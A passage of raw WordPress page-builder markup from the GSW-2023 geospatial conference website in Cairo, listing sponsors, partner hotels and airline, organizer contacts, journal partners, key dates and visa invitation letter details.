!important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 